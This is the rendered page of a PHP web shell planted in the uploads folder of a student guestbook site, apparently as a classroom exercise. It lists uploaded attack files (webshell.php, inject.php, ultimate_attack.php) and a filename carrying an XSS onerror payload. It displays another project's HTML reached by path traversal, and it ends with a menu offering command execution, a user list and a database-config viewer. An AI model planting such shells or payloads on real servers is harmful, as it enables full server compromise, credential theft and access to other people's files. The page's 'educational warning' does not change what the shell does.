🐚 WEB SHELL ACTIVATED

📁 File Browser

Current directory: /home/klas4s23/domains/585455.klas4s23.mid-ica.nl/public_html/Gastenboek/uploads

📄 ' onerror='alert(`Gehacked door Jasper!`);window.location.replace(`..`)'.png [view]
📁 ..
📄 003b15869ae62d2ceeee451a5f652dd6.png [view]
📄 0tk5j14v024b1.jpg [view]
📄 300px-Cursed_Cat.jpg [view]
📄 32640-afbeelding-1__ScaleMaxWidthWzYwMF0_CompressedW10.jpg [view]
📄 Bill-Gates-Paul-Allen-2013.jpg [view]
📄 CV Jasper Kramp.png [view]
📄 Cat profile.png [view]
📄 Fronalpstock_big.jpg [view]
📄 Krik en las.jpg [view]
📄 Krik.jpg [view]
📄 Pino-dood-03.jpg [view]
📄 Shellz.php [view]
📄 Ted_Kaczynski_2_(cropped).jpg [view]
📄 Tux.svg.png [view]
📄 Z.png [view]
📄 android.jpg [view]
📄 apple.php [view]
📄 cianancatfish.jpg [view]
📄 downloads (1).jpeg [view]
📄 downloads.jpeg [view]
📄 epresso.jpg [view]
📄 fake_photo.png [view]
📄 hand.jpg [view]
📄 https___dynaimage.cdn.cnn.com_cnn_x_156,y_210,w_1209,h_1612,c_crop_https2F2F5bae1c384db3d70020c01c40%2FfireflyWolfy.jpg [view]
📄 image.png [view]
📄 images.jpeg [view]
📄 info.php [view]
📄 inject.php [view]
📄 instant_redirect.jpg [view]
📄 japper.jpg [view]
📄 koekiemonster-3.jpg [view]
📄 logo.png [view]
📄 muis.jpg [view]
📄 people-call-woman-ugly-responds-with-more-selfies-melissa-blake-1-5d75f249a418b__700.jpg [view]
📄 picobellobv.jpeg [view]
📄 redirect.php [view]
📄 rupsje-nooitgenoeg-knuffel-pluche-42-cm-500x500.jpg [view]
📄 sdfsa.png [view]
📄 sneaky.svg [view]
📄 taylor.webp [view]
📄 test.html [view]
📄 testpreg.php [view]
📄 testpreg1.php [view]
📄 testtest.php.JPG [view]
📄 ultimate_attack.gif [view]
📄 ultimate_attack.php [view]
📄 ultimate_attack.svg [view]
📄 wallpaper.jpg [view]
📄 webshell.php [view]

📄 Viewing: ./../../l7-pro-2-e-learning-2023-Epolleke/lists.html

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>My Word Lists - English Learning</title>
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Poppins:wght@300;400;500;600;700&display=swap" rel="stylesheet">
    <link rel="stylesheet" href="css/style.css">
    <link rel="stylesheet" href="css/lists.css">
</head>
<body>
    <!-- Header -->
    <header class="header">
        <div class="container">
            <div class="logo">
                <h1>📚 My Word Lists</h1>
            </div>
            <nav class="nav">
                <a href="index.html">← Back to Practice</a>
                <div id="userMenu" class="user-menu"></div>
            </nav>
        </div>
    </header>

    <!-- Main Content -->
    <section class="lists-page-section">
        <div class="container">
            <!-- Create New List Section -->
            <div class="create-list-section">
                <h2>Create New Word List</h2>
                <form id="createListForm">
                    <div class="form-group">
                        <label for="listName">List Name *</label>
                        <input type="text" id="listName" required maxlength="100" placeholder="e.g., Medical Terminology">
                    </div>
                    <div class="form-group">
                        <label for="listDescription">Description</label>
                        <textarea id="listDescription" rows="3" maxlength="500" placeholder="Describe what this list is for..."></textarea>
                    </div>
                    <div class="form-group checkbox-group">
                        <label>
                            <input type="checkbox" id="isPublic">
                            <span>Make this list public (others can view and use it)</span>
                        </label>
                    </div>
                    <button type="submit" class="btn btn-primary">Create List</button>
                </form>
            </div>

            <!-- Word Lists Display -->
            <div class="lists-section">
                <h2>Your Word Lists</h2>
                <div id="listsContainer">
                    <p class="loading">Loading your word lists...</p>
                </div>
            </div>

            <div class="lists-section">
                <h2>Public Word Lists</h2>
                <div id="publicListsContainer">
                    <p class="loading">Loading public lists...</p>
                </div>
            </div>
        </div>
    </section>

    <!-- Footer -->
    <footer class="footer">
        <div class="container">
            <p>&copy; 2025 English Vocabulary Trainer | Built with PHP, MySQL, JavaScript & AJAX</p>
            <p>Practice makes perfect! 💪</p>
        </div>
    </footer>

    <!-- Modal for adding words to a list -->
    <div id="addWordModal" class="modal">
        <div class="modal-content">
            <span class="close">&times;</span>
            <h2>Add Word to <span id="modalListName"></span></h2>
            <form id="addWordForm">
                <input type="hidden" id="selectedListId">
                <div class="form-group">
                    <label for="englishWord">English Word *</label>
                    <input type="text" id="englishWord" required maxlength="100">
                </div>
                <div class="form-group">
                    <label for="dutchTranslation">Dutch Translation *</label>
                    <input type="text" id="dutchTranslation" required maxlength="100">
                </div>
                <div class="form-group">
                    <label for="difficulty">Difficulty Level</label>
                    <select id="difficulty">
                        <option value="beginner">Beginner</option>
                        <option value="intermediate">Intermediate</option>
                        <option value="advanced">Advanced</option>
                    </select>
                </div>
                <div class="form-group">
                    <label for="notes">Notes</label>
                    <textarea id="notes" rows="3" maxlength="500" placeholder="Optional notes about this word..."></textarea>
                </div>
                <button type="submit" class="btn btn-primary">Add Word</button>
            </form>
        </div>
    </div>

    <!-- Modal for viewing list words -->
    <div id="viewListModal" class="modal">
        <div class="modal-content large">
            <span class="close view-close">&times;</span>
            <h2 id="viewListTitle"></h2>
            <p id="viewListDescription"></p>
            <div id="viewListWords">
                <p class="loading">Loading words...</p>
            </div>
        </div>
    </div>

    <script src="js/auth.js"></script>
    <script src="js/lists.js"></script>
</body>
</html>

🎯 Available Actions

Command Execution:

Quick Commands:

📋 List files | 👤 Show user | 📍 Show directory | 🔄 Show processes | 🔐 Show users

File Operations:

⬆️ Parent directory | 🏠 Root directory | 🔍 View DB config
⚠️ Educational Warning: This demonstrates a web shell vulnerability. In a real attack, this could allow complete server compromise!